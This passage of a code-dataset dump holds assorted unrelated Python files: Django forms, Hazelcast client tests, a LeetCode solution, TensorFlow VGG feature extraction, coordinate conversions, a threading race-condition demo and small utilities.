def __init__(self, *args, 
**kwargs):\n super(DailyReportFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('header', css_class='col-md-4'),\n Div('create_time', css_class='col-md-4'),\n css_class='row'\n ),\n Div(\n Div('report_content', css_class='col-md-2'),\n Div('assess', css_class='col-md-4'),\n css_class='row'\n ),\n Div(\n Div('score', css_class='col-md-2'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=DAILYREPORT_FORMS_PREFIX)\n\n\nclass DailyReportForm(ModelForm):\n class Meta:\n model = DailyReport\n fields = ('user', 'header', 'create_time', 'report_content', 'assess', 'score')\n widgets = {\n 'report_content': RedactorWidget(editor_options={'lang': 'en','minHeight':300}),\n 'assess': RedactorWidget(editor_options={'lang': 'en','minHeight':200})\n }\n\n\nclass RegularMeetingFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(RegularMeetingFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('title', css_class='col-md-4'),\n Div('specker', css_class='col-md-4'),\n Div('participant', css_class='col-md-2'),\n Div('meeting_time', css_class='col-md-4'),\n Div('enclosure', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('main_content', css_class='col-md-2'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=REGULARMETTING_FORMS_PREFIX)\n\n\nclass RegularMeetingForm(ModelForm):\n class Meta:\n model = RegularMeeting\n exclude = ['user']\n widgets = {\n 'main_content': RedactorWidget(editor_options={'lang': 'en'})\n }\n\n\nclass StudentForm(ModelForm):\n class Meta:\n model = Student\n fields = ('sname', 'age', 'sex', 'sdept')\n\n def __init__(self, *args, **kwargs):\n super(StudentForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_student'\n self.helper.form_method = 'POST'\n self.helper.layout = Layout(\n Div(\n Div('sname', css_class='col-xs-5'),\n Div('sdept', css_class='col-xs-5'),\n Div('age', css_class='col-xs-5'),\n Div('sex', css_class='col-xs-5'),\n css_class='form-group'\n ),\n Div(\n Div('age', css_class='col-xs-5'),\n Div('sex', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n","sub_path":"employees/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":21412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"451460149","text":"import warnings\nwarnings.filterwarnings('ignore')\nfrom models.transform import transform_pr, transform_issues\n\n\n# create a csv of pull requests\npr = transform_pr()\npr.to_csv(\"./data/pull_requests.csv\", index=False)\n\n# create a csv of pull issues\nissues = transform_issues()\nissues.to_csv(\"./data/issues.csv\", index=False)\n","sub_path":"upwork-devs/moses-mugo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"490010714","text":"#!/usr/bin/env python3\n# coding: utf-8\nimport Pyro4\nimport socket\nfrom InterfaceGrafica import *\n\n# SERVIDOR DO 
SS\n\n@Pyro4.expose\nclass SupervisorioSR_SS:\n\n def setDirecao(self):\n raiz = Tk()\n grafico = InterfaceGrafica(raiz)\n return grafico.desenhar()\n\ndef get_ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n # doesn't even have to be reachable\n s.connect(('10.255.255.255', 1))\n IP = s.getsockname()[0]\n except:\n IP = '127.0.0.1'\n finally:\n s.close()\n return IP\n\nns = Pyro4.locateNS(get_ip())\ndaemon = Pyro4.Daemon(get_ip())\nprint(get_ip())\nuri = daemon.register(SupervisorioSR_SS)\nns.register('serverSR-SS',uri)\nprint(uri)\ndaemon.requestLoop()\n","sub_path":"projetoRobo/antigo/SupervisorioSR_SS.py","file_name":"SupervisorioSR_SS.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"384931182","text":"import uuid\n\nfrom mock import patch\n\nfrom hazelcast import HazelcastClient\nfrom hazelcast.core import Address, MemberInfo, MemberVersion, EndpointQualifier, ProtocolType\nfrom hazelcast.errors import IllegalStateError, TargetDisconnectedError\nfrom tests.base import HazelcastTestCase\n\n_UNREACHABLE_ADDRESS = Address(\"192.168.0.1\", 5701)\n_MEMBER_VERSION = MemberVersion(5, 0, 0)\n_CLIENT_PUBLIC_ENDPOINT_QUALIFIER = EndpointQualifier(ProtocolType.CLIENT, \"public\")\n\n\nclass ConnectionManagerTranslateTest(HazelcastTestCase):\n\n rc = None\n cluster = None\n member = None\n\n @classmethod\n def setUpClass(cls):\n cls.rc = cls.create_rc()\n cls.cluster = cls.create_cluster(cls.rc, None)\n cls.member = cls.cluster.start_member()\n\n @classmethod\n def tearDownClass(cls):\n cls.rc.terminateCluster(cls.cluster.id)\n cls.rc.exit()\n\n def setUp(self):\n self.client = None\n\n def tearDown(self):\n if self.client:\n self.client.shutdown()\n\n def test_translate_is_used(self):\n # It shouldn't be able to connect to cluster using unreachable\n # public address.\n with self.assertRaises(IllegalStateError):\n with patch.object(\n HazelcastClient,\n \"_create_address_provider\",\n return_value=TestAddressProvider(True, self.member.address),\n ):\n self.client = HazelcastClient(\n cluster_name=self.cluster.id,\n cluster_connect_timeout=1.0,\n connection_timeout=1.0,\n )\n\n def test_translate_is_not_used_when_getting_existing_connection(self):\n provider = TestAddressProvider(False, self.member.address)\n with patch.object(\n HazelcastClient,\n \"_create_address_provider\",\n return_value=provider,\n ):\n self.client = HazelcastClient(\n cluster_name=self.cluster.id,\n )\n # If the translate is used for this, it would return\n # the unreachable address and the connection attempt\n # would fail.\n provider.should_translate = True\n conn_manager = self.client._connection_manager\n conn = conn_manager._get_or_connect_to_address(self.member.address).result()\n self.assertIsNotNone(conn)\n\n def test_translate_is_used_when_member_has_public_client_address(self):\n self.client = HazelcastClient(\n cluster_name=self.cluster.id,\n use_public_ip=True,\n )\n\n member = MemberInfo(\n _UNREACHABLE_ADDRESS,\n uuid.uuid4(),\n [],\n False,\n _MEMBER_VERSION,\n None,\n {\n _CLIENT_PUBLIC_ENDPOINT_QUALIFIER: self.member.address,\n },\n )\n conn_manager = self.client._connection_manager\n conn = conn_manager._get_or_connect_to_member(member).result()\n self.assertIsNotNone(conn)\n\n def test_translate_is_not_used_when_member_has_public_client_address_but_option_is_disabled(\n self,\n ):\n self.client = HazelcastClient(\n cluster_name=self.cluster.id,\n connection_timeout=1.0,\n 
use_public_ip=False,\n )\n\n member = MemberInfo(\n _UNREACHABLE_ADDRESS,\n uuid.uuid4(),\n [],\n False,\n _MEMBER_VERSION,\n None,\n {\n _CLIENT_PUBLIC_ENDPOINT_QUALIFIER: self.member.address,\n },\n )\n conn_manager = self.client._connection_manager\n\n with self.assertRaises(TargetDisconnectedError):\n conn_manager._get_or_connect_to_member(member).result()\n\n\nclass TestAddressProvider(object):\n def __init__(self, should_translate, member_address):\n self.should_translate = should_translate\n self.member_address = member_address\n\n def load_addresses(self):\n return [self.member_address], []\n\n def translate(self, address):\n if not self.should_translate:\n return address\n\n if address == self.member_address:\n return _UNREACHABLE_ADDRESS\n\n return None\n","sub_path":"tests/integration/connection_manager_translate_test.py","file_name":"connection_manager_translate_test.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"252895313","text":"import collections, heapq\n\n\nclass Solution(object):\n\n def topKFrequent(self, words, k):\n \"\"\"\n :type words: List[str]\n :type k: int\n :rtype: List[str]\n\n ACE\n 45 ms\n\n let N be length or words\n\n O(N + klogN) time complexity\n O(N) space complexity\n\n https://leetcode.com/problems/top-k-frequent-words/solution/\n \"\"\"\n pq = [(-freq, word) for word, freq in collections.Counter(words).items()]\n heapq.heapify(pq)\n return [heapq.heappop(pq)[1] for _ in range(k)]\n\n def topKFrequent(self, words, k):\n \"\"\"\n :type words: List[str]\n :type k: int\n :rtype: List[str]\n\n ACE\n 45 ms\n\n heapify words ordered by (-frequency, lexical_order)\n return first k entries from heap as result\n \"\"\"\n pq = [(-freq, word) for word, freq in collections.Counter(words).items()]\n heapq.heapify(pq)\n res = []\n for _ in range(k):\n _, w = heapq.heappop(pq)\n res.append(w)\n return res\n\n def topKFrequent(self, words, k):\n \"\"\"\n :type words: List[str]\n :type k: int\n :rtype: List[str]\n\n ACE\n 45 ms\n\n return words ordered by (-frequency, lexical_order)\n\n create map word -> freq\n create a min heap of tuples (-frequency, lexical_order)\n add all map entries to heap\n\n return first k entries from heap as result\n \"\"\"\n m = collections.Counter(words)\n pq, res = [], []\n for word, freq in m.items():\n heapq.heappush(pq, (-freq, word))\n for _ in range(k):\n _, w = heapq.heappop(pq)\n res.append(w)\n return res\n\n def topKFrequent(self, words, k):\n \"\"\"\n :type words: List[str]\n :type k: int\n :rtype: List[str]\n\n ACE\n 50 ms\n\n Unfortunately, we cannot use -word like we can with numeric values\n So we implement a wrapper class which overrides the lt operator\n\n 1. Possible Improvement:\n\n we can use a max heap on (-frequency, lexical_order) to only keep k elements in heap\n add first k map entires to max heap\n for remaining map entries (f, w)\n if f < heap.peek.f or f == heap.peek.f and w < heap.peek.w\n add to heap and pop the max element\n finally remove the elements from heap in order, reverse the order, and return as result\n\n 2. 
Possible Improvement Accounting for no max heap in Python:\n\n we can use a min heap on (frequency, inverse_lexical_order_word, word) to only keep k elements in heap\n add first k map entires to max heap\n for remaining map entries (freq, word)\n if we find a greater frequency or lexically smaller word, then add to heap and pop max\n a lexically smaller word corresponds to a lexically greater InvertedWord\n if heap.peek.f < freq or heap.peek.f == freq and heap.peek.key < make_key(w)\n add to heap and pop the max element\n finally remove the elements from heap in order, reverse the order, and return as result\n \"\"\"\n m = collections.Counter(words)\n pq, res = [], []\n for word, freq in m.items():\n inverse = InvertedWord(word)\n if len(pq) < k:\n heapq.heappush(pq, (freq, inverse, word))\n else:\n f, inv, _ = pq[0]\n if f < freq or f == freq and inv < inverse:\n heapq.heappush(pq, (freq, inverse, word))\n heapq.heappop(pq)\n for _ in range(k):\n _, _, w = heapq.heappop(pq)\n res.append(w)\n return res[::-1]\n\n\nclass InvertedWord(object):\n def __init__(self, val):\n self.val = val\n def __lt__(self, other):\n return self.val > other.val\n\n\nif __name__ == '__main__':\n s = Solution()\n tests = [\n (\n [\"i\", \"love\", \"leetcode\", \"i\", \"love\", \"coding\"],\n 2,\n [\"i\", \"love\"]\n ),\n (\n [\"the\", \"day\", \"is\", \"sunny\", \"the\", \"the\", \"the\", \"sunny\", \"is\", \"is\"],\n 4,\n [\"the\", \"is\", \"sunny\", \"day\"]\n ),\n\n ]\n for words, k, exp in tests:\n res = s.topKFrequent(words, k)\n print(\"{} : {} -> {}\".format(words, k, res))\n assert res == exp","sub_path":"692_top_k_frequent_words.py","file_name":"692_top_k_frequent_words.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"356654216","text":"# -*- coding: utf-8 -*-\n# @Time : 2018\\12\\20 0020 14:31\n# @Author : 凯\n# @File : tmp.py\nimport tensorflow as tf\nwith tf.device(device_type): # <= This is optional\n n_input = 784\n n_output = 10\n weights = {\n 'wc1': tf.Variable(tf.random_normal([3, 3, 1, 64], stddev=0.1)),\n 'wd1': tf.Variable(tf.random_normal([14*14*64, n_output], stddev=0.1))\n }\n biases = {\n 'bc1': tf.Variable(tf.random_normal([64], stddev=0.1)),\n 'bd1': tf.Variable(tf.random_normal([n_output], stddev=0.1))\n }\n def conv_simple(_input, _w, _b):\n # Reshape input\n _input_r = tf.reshape(_input, shape=[-1, 28, 28, 1])\n # Convolution\n _conv1 = tf.nn.conv2d(_input_r, _w['wc1'], strides=[1, 1, 1, 1], padding='SAME')\n # Add-bias\n _conv2 = tf.nn.bias_add(_conv1, _b['bc1'])\n # Pass ReLu\n _conv3 = tf.nn.relu(_conv2)\n # Max-pooling\n _pool = tf.nn.max_pool(_conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n # Vectorize\n _dense = tf.reshape(_pool, [-1, _w['wd1'].get_shape().as_list()[0]])\n # Fully-connected layer\n _out = tf.add(tf.matmul(_dense, _w['wd1']), _b['bd1'])\n # Return everything\n out = {\n 'input_r': _input_r, 'conv1': _conv1, 'conv2': _conv2, 'conv3': _conv3\n , 'pool': _pool, 'dense': _dense, 'out': _out\n }\n return out\nprint (\"CNN ready\")\n\nimport scipy.io\nimport numpy as np\nimport os\nimport scipy.misc\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\ncwd = os.getcwd()\nVGG_PATH = cwd + \"/data/imagenet-vgg-verydeep-19.mat\"\nCONTENT_PATH = cwd + \"/images/zly1.jpg\"\nCONTENT_LAYER = 'relu2_2'\nSTYLE_LAYERS = ('relu1_1', 'relu2_1', 'relu3_1', 'relu4_1', 'relu5_1')\n# STYLE_LAYERS = ('relu1_1', 'relu2_1')\nraw_content = 
scipy.misc.imread(CONTENT_PATH)\n\n\ncontent_image = raw_content.astype(np.float)\ncontent_shape = (1,) + content_image.shape # (h, w, nch) => (1, h, w, nch)\nprint (\"Packages loaded\")\n\nlayers = (\n    'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',\n    'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',\n    'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',\n    'relu3_3', 'conv3_4', 'relu3_4', 'pool3',\n    'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',\n    'relu4_3', 'conv4_4', 'relu4_4', 'pool4',\n    'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n    'relu5_3', 'conv5_4', 'relu5_4'\n)\n# load the .mat file once so its layer structure can be inspected below\ndata = scipy.io.loadmat(VGG_PATH)\nlayer = data['layers']\nprint(\"layer.shape:\", layer.shape)\n# print(layer) outputs (1, 1): there is only one element\nprint(\"layer[0].shape:\", layer[0].shape)\n# layer[0][0].shape: (1,), which shows there is only one element\nprint(\"layer[0][0].shape:\", layer[0][0].shape)\n\n# layer[0][0][0].shape: (1,), which shows there is only one element\nprint(\"layer[0][0][0].shape:\", layer[0][0][0].shape)\n# len(layer[0][0]): 5, i.e. weight (including bias), pad (padding, unused), type, name, stride\nprint(\"len(layer[0][0][0]):\", len(layer[0][0][0]))\n# so the fields can be read like this, e.g. name prints ['conv1_1']\nprint(\"name:\", layer[0][0][0][3])\n# inspect the weights: the output (1, 2) again shows the first dimension is dummy; weights holds weight and bias\nprint(\"layer[0][0][0][0].shape\", layer[0][0][0][0].shape)\nprint(\"layer[0][0][0][0].len\", len(layer[0][0][0][0]))\n\n# weights[0].shape: (2,), weights[0].len: 2, i.e. the two elements are weight and bias\nprint(\"layer[0][0][0][0][0].shape:\", layer[0][0][0][0][0].shape)\nprint(\"layer[0][0][0][0].len:\", len(layer[0][0][0][0][0]))\n\nweights = layer[0][0][0][0][0]\n# unpack weight and bias\nweight, bias = weights\n# weight.shape: (3, 3, 3, 64)\nprint(\"weight.shape:\", weight.shape)\n# bias.shape: (1, 64)\n\n\ndef _conv_layer(input, weights, bias):\n    conv = tf.nn.conv2d(input, tf.constant(weights), strides=(1, 1, 1, 1),\n            padding='SAME')\n    return tf.nn.bias_add(conv, bias)\ndef _pool_layer(input):\n    return tf.nn.max_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),\n            padding='SAME')\ndef preprocess(image, mean_pixel):\n    return image - mean_pixel\ndef unprocess(image, mean_pixel):\n    return image + mean_pixel\ndef imread(path):\n    return scipy.misc.imread(path).astype(np.float)\ndef imsave(path, img):\n    img = np.clip(img, 0, 255).astype(np.uint8)\n    scipy.misc.imsave(path, img)\ndef net(data_path, input_image):\n    # build the VGG-19 feature graph from the matconvnet weights\n    data = scipy.io.loadmat(data_path)\n    mean = data['normalization'][0][0][0]\n    mean_pixel = np.mean(mean, axis=(0, 1))\n    weights = data['layers'][0]\n    net = {}\n    current = input_image\n    for i, name in enumerate(layers):\n        kind = name[:4]\n        if kind == 'conv':\n            kernels, bias = weights[i][0][0][0][0]\n            # matconvnet: weights are [width, height, in_channels, out_channels]\n            # tensorflow: weights are [height, width, in_channels, out_channels]\n            kernels = np.transpose(kernels, (1, 0, 2, 3))\n            bias = bias.reshape(-1)\n            current = _conv_layer(current, kernels, bias)\n        elif kind == 'relu':\n            current = tf.nn.relu(current)\n        elif kind == 'pool':\n            current = _pool_layer(current)\n        net[name] = current\n    assert len(net) == len(layers)\n    return net, mean_pixel, layers\nprint (\"Network for VGG ready\")\n\nplt.figure(0, figsize=(10, 
5))\nplt.imshow(raw_content)\nplt.title(\"Original content image\")\nplt.show()\n\ncontent_image = raw_content.astype(np.float)\ncontent_shape = (1,) + content_image.shape # (h, w, nch) => (1, h, w, nch)\nwith tf.Graph().as_default(), tf.Session() as sess:\n image = tf.placeholder('float', shape=content_shape)\n nets, content_mean_pixel, _ = net(VGG_PATH, image)\n content_image_pre = np.array([preprocess(content_image, content_mean_pixel)])\n content_features = nets[CONTENT_LAYER].eval(feed_dict={image: content_image_pre})\n print (\" Type of 'features' is \", type(content_features))\n print (\" Shape of 'features' is %s\" % (content_features.shape,))\n # Plot response\n for i in range(5):\n plt.figure(i, figsize=(10, 5))\n plt.matshow(content_features[0, :, :, i], cmap=plt.cm.gray, fignum=i)\n plt.title(\"%d-layer content feature\" % (i))\n plt.colorbar()\n plt.show()","sub_path":"notebooks/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":6524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"486414884","text":"from block import *\nimport os\nimport hashlib\nfrom logging import ERROR, WARN, INFO, DEBUG\n\nclass secure_hash(Block):\n def on_load(self, config):\n self.config = config\n self.add_port(\"input\", Port.PUSH, Port.UNNAMED, [\"url\"])\n self.add_port(\"output\", Port.PUSH, Port.UNNAMED, [\"url\", \"fingerprint\"])\n self.add_port(\"query\", Port.QUERY, Port.UNNAMED, [\"url\"])\n \n def hash(self, c):\n return hashlib.sha224(c).hexdigest()\n\n def get_hashes(self, log):\n data_urls = log[\"url\"]\n hash_list = [self.hash(BlockUtils.fetch_file_at_url(u, self.ip_address))\n for u in data_urls]\n return hash_list\n \n def recv_push(self, port, log):\n if log.log.has_key(\"token\"):\n self.log(INFO, self.id + \" got the finish token for directory \" + log.log[\"token\"][0])\n else:\n hashes = self.get_hashes(log.log)\n log.append_field(\"fingerprint\", hashes)\n\n self.push(\"output\", log)\n \n def recv_query(self, port_name, log):\n nl = Log()\n hashes = self.get_hashes(log)\n nl.set_log({\"fingerprint\": hashes})\n self.return_query_res(port_name, nl)\n","sub_path":"blox/secure_hash__1_0/b_secure_hash.py","file_name":"b_secure_hash.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"293657421","text":"\"\"\"\nCoordinate conversions with the kapteyn Python package.\n\nkapteyn.celestial is very feature-complete and has great docs.\nCheck this out:\n\nhttp://www.astro.rug.nl/software/kapteyn/celestial.html\nhttp://www.astro.rug.nl/software/kapteyn/celestial.html#celestial.sky2sky\nhttp://www.astro.rug.nl/software/kapteyn/celestial.html#celestial.skyparser\n\nhttp://www.astro.rug.nl/software/kapteyn/celestialbackground.html\nhttp://www.astro.rug.nl/software/kapteyn/celestialbackground.html#composing-other-transformations\n\"\"\"\nimport numpy as np\nfrom kapteyn import celestial\n\n# Read in initial coordinates as J2000 coordinates\ninitial_coords = np.loadtxt('../initial_coords.txt')\n\ndef transform_to(skyout, tag):\n \"\"\"Convert the test input coordinates to a given output system and save to text file\"\"\"\n skyin = 'fk5'\n output = celestial.sky2sky(skyin, skyout, initial_coords[:,0], initial_coords[:,1])\n np.savetxt('coords_{tag}.txt'.format(tag=tag), output, fmt=\"%20.15f\")\n\ntransform_to(skyout='galactic', tag='galactic')\ntransform_to(skyout='fk4,J2000_OBS', 
tag='b1950')\ntransform_to(skyout='ecliptic,J2000', tag='ecliptic')\n","sub_path":"kapteyn/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"195703546","text":"# personal discord embed for rex \n\n\nimport discord\n\n\nclass Rexembed:\n\n def __init__(self, title='', description='', colour='', thumbnail='', image='', footer=''):\n\n self.title = title\n self.description = description\n self.thumbnail = thumbnail\n self.image = image\n self.footer = footer\n colour = colour.lower()\n if colour == 'red':\n self.colour = discord.Colour.red()\n elif colour == 'green':\n self.colour = discord.Colour.green()\n elif colour == 'blue':\n self.colour = discord.Colour.blue()\n\n\n def normal_embed(self):\n rembed = discord.Embed(\n title = self.title,\n description = self.description,\n colour = self.colour,\n )\n \n rembed.set_thumbnail(url=self.thumbnail)\n rembed.set_image(url=self.image)\n rembed.set_footer(text=self.footer)\n\n return rembed","sub_path":"embed.py","file_name":"embed.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"359598772","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('eksport_pbn', '0007_auto_20160127_0836'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='plikeksportupbn',\n name='rodzaj_daty',\n field=models.SmallIntegerField(default=3, help_text=b'Jakie pole z dat\xc4\x85 b\xc4\x99dzie u\xc5\xbcywane do wybierania rekord\xc3\xb3w?', verbose_name=b'Rodzaj pola daty', choices=[(1, b'data utworzenia'), (2, b'data aktualizacji'), (3, b'data aktualizacji dla PBN')]),\n ),\n ]\n","sub_path":"src/eksport_pbn/migrations/0008_auto_20160802_2346.py","file_name":"0008_auto_20160802_2346.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"389295346","text":"#!/usr/bin/env python3 -tt\nimport getopt\nimport collections\nimport sys\nimport os\nimport logging\nfrom time import time, sleep\nfrom colorama import Fore\nfrom threading import Thread, Lock\n\n\n# used http://agiliq.com/blog/2013/09/understanding-threads-in-python/\n\nthread = 100\nloop = 10\nmutex = Lock()\nglobal_var = 0\nglobal_varLock = 0\nglobal_varMutex = 0\nglobal_varPeterson = 0\nlevel = []\nwaiting = []\n\nif __name__ == '__main__':\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], 't:l:hmp', ['threads', 'loops',\n 'help', 'mutex', \n 'peterson'])\n\n\n except getopt.GetoptError:\n logging.error(\"Invalid argument\")\n sys.exit(1)\n\n\n class IncrementThread(Thread):\n def run(self):\n global global_var\n for i in range(loop):\n read_value = global_var\n sleep(0.00002)\n global_var = read_value + 1\n\n def race(n_threads, n_loops):\n threads = []\n for i in range(n_threads):\n t = IncrementThread()\n threads.append(t)\n t.start()\n for t in threads:\n t.join()\n global global_var\n cur = global_var\n exs = n_threads * n_loops\n return(exs, cur)\n\n class IncrementThreadLock(Thread):\n def run(self):\n global global_varLock\n for i in range(loop):\n global_varLock += 1\n\n\n def race_lock(n_threads, n_loops):\n threads = []\n for i in range(n_threads):\n t = IncrementThreadLock()\n threads.append(t)\n t.start()\n for t in threads:\n t.join()\n global global_varLock\n cur = 
global_varLock\n exs = n_threads * n_loops\n return(exs, cur)\n\n\n class IncrementThreadMutex(Thread):\n def run(self):\n global global_varMutex\n for i in range(loop):\n mutex.acquire()\n read_valueMu = global_varMutex\n global_varMutex = read_valueMu + 1\n mutex.release()\n\n def race_m(n_threads, n_loops):\n threads = []\n for i in range(n_threads):\n t = IncrementThreadMutex()\n threads.append(t)\n t.start()\n for t in threads:\n t.join()\n global global_varMutex\n cur = global_varMutex\n exp = n_threads * n_loops\n return(exp, cur)\n \n class IncrementThreadPeterson(Thread):\n def run (self):\n global global_varPeterson\n for i in range(loop):\n read_value = global_varPeterson\n global_varPeterson = read_value + 1\n\n\n def race_p(n_threads, n_loops):\n global global_varPeterson\n for j in range(n_threads):\n level.append(0)\n waiting.append(0)\n\n for i in range(n_threads):\n for j in range(1, n_threads):\n level[i] = j\n waiting[j] = i\n for k in range(n_threads):\n if k == i:\n continue\n while waiting[j] == i and level[k] >= level[i]:\n sleep(0.00002)\n\n t = IncrementThreadPeterson()\n t.start()\n t.join()\n level[i] = 0\n cur = global_varPeterson\n exp = n_threads * n_loops\n return(exp, cur)\n\n def helps():\n print(Fore.RED + \"-h / --help: help\\n\" +\n \"-t / --threads: number of threads which should be created\" +\n \" (default = 100)\\n\" +\n \"-l / --loops: how often the global variable should be incremented\" +\n \" in the thread function\\n\" +\n \"-m / --mutex: protects the global variable with a mutex\\n\" +\n \"-p / --peterson: protects the global variable with the Peterson algorithm\\n\" +\n Fore.RESET)\n return\n\n\n if (len(opts) == 0):\n helps()\n\n for opt, arg in opts:\n if(opt in ('-h', '--help')):\n helps()\n elif(opt in ('-t', '--threads')):\n thread = int(arg)\n elif(opt in ('-l', '--loops')):\n loop = int(arg)\n elif(opt in ('-m', '--mutex')):\n starttime = time()\n res_race_m = race_m(thread, loop)\n endtime = time()\n print(\"Mutex: After %s modifications, global_var should have become %s\" % (res_race_m[0], res_race_m[0]))\n print(\"Mutex: After %s modifications, global_var is %s\" % (res_race_m[0], res_race_m[1]))\n print(\"Performance: \" + Fore.RED + \"%s\" % str(endtime - starttime) + Fore.RESET)\n sys.exit()\n elif(opt in ('-p', '--peterson')):\n starttime = time()\n res_race_p = race_p(thread, loop)\n endtime = time()\n print(\"Peterson: After %s modifications, global_var should have become %s\" % (res_race_p[0], res_race_p[0]))\n print(\"Peterson: After %s modifications, global_var is %s\" % (res_race_p[0], res_race_p[1]))\n print(\"Performance: \" + Fore.RED + \"%s\" % str(endtime - starttime) + Fore.RESET)\n sys.exit()\n res_race = race(thread, loop)\n res_race_lock = race_lock(thread, loop)\n \n\n print(\"Race: After %s modifications, global_var should have become %s\" % (res_race[0], res_race[0]))\n print(\"Race: After %s modifications, global_var is %s\" % (res_race[0], res_race[1]))\n\n print(\"Race lock: After %s modifications, global_var should have become %s\" % (res_race_lock[0], res_race_lock[0]))\n print(\"Race lock: After %s modifications, global_var is %s\" % (res_race_lock[0], res_race_lock[1]))\n\n ","sub_path":"L3/racecondition.py","file_name":"racecondition.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"209322323","text":"from datetime import datetime \nimport json\nimport warnings\nfrom enum import Enum\n\n\ndef GetDate():\n return 
str(datetime.now().strftime('%d/%m/%Y %H:%M:%S'))\n\ndef GetTime():\n return str(datetime.now().strftime('%H:%M:%S'))\n\n\ndef InList(lstBuscar, conteudo):\n return any(x in conteudo for x in lstBuscar)\n\n\ndef InListAnyInS(lstBuscar, conteudo):\n if isinstance(conteudo, (list)):\n conteudoUpper = [x.upper() for x in conteudo]\n else:\n conteudoUpper = conteudo.upper()\n\n lstBuscarUpper = [x.upper() for x in lstBuscar]\n return any(x in conteudoUpper for x in lstBuscarUpper)\n\n\ndef InListAllInS(lstBuscar, conteudo):\n if isinstance(conteudo, (list)):\n conteudoUpper = [x.upper() for x in conteudo]\n else:\n conteudoUpper = conteudo.upper()\n\n lstBuscarUpper = [x.upper() for x in lstBuscar]\n return all(x in conteudoUpper for x in lstBuscarUpper)\n\n\nclass LogObj:\n def toJSON(self):\n dumps = json.dumps(self, default=lambda o: o.__dict__, sort_keys=False, indent=4)\n return json.loads(dumps)\n\n\nclass PostFeed(object):\n def __init__(self, titulo, tags, link, data, origem):\n self.titulo = titulo\n self.tags = tags\n self.link = str(link)\n self.data = data\n self.origem = origem\n self.criadoEm = GetDate()\n\n def toJSON(self):\n dumps = json.dumps(self, default=lambda o: o.__dict__, sort_keys=False, indent=4)\n return json.loads(dumps)\n\n\nclass TipoLink(Enum):\n Desconhecido = 'Desconhecido'\n AppStore = 'Apple Store (iOS)'\n Mac = 'Mac Store'\n PlayStore = 'Google Play Store (Android)'\n News = 'Notícias'\n Video = 'Vídeo'\n Crowdfunding = 'Crowdfunding'\n\n\nclass LinkObj(object):\n def __init__(self, fonte, texto, postUrl, link, tipoLink):\n self.fonte = fonte\n self.texto = texto\n self.postUrl = postUrl\n self.link = str(link)\n self.tipo = tipoLink.value\n self.criadoEm = GetDate()\n\n \n def toJSON(self):\n dumps = json.dumps(self, default=lambda o: o.__dict__, sort_keys=False, indent=4)\n return json.loads(dumps)\n\n\ndef DateTimeDiff(s1, s2):\n tdelta = s2 - s1\n tempoGasto = ''\n\n plural = '(s)' if tdelta.days > 1 else ''\n if tdelta.days > 0:\n tempoGasto += '{} dia{} '.format(tdelta.days, plural)\n\n hora = tdelta.seconds//3600\n plural = '(s)' if hora > 1 else ''\n if hora > 0: \n tempoGasto += '{} hora{} '.format(hora, plural)\n\n minutos = (tdelta.seconds//60)%60\n plural = '(s)' if minutos > 1 else ''\n if minutos > 0: \n tempoGasto += '{} minuto{} '.format(minutos, plural)\n\n tempoGasto += '{} seg'.format(tdelta.seconds)\n\n return 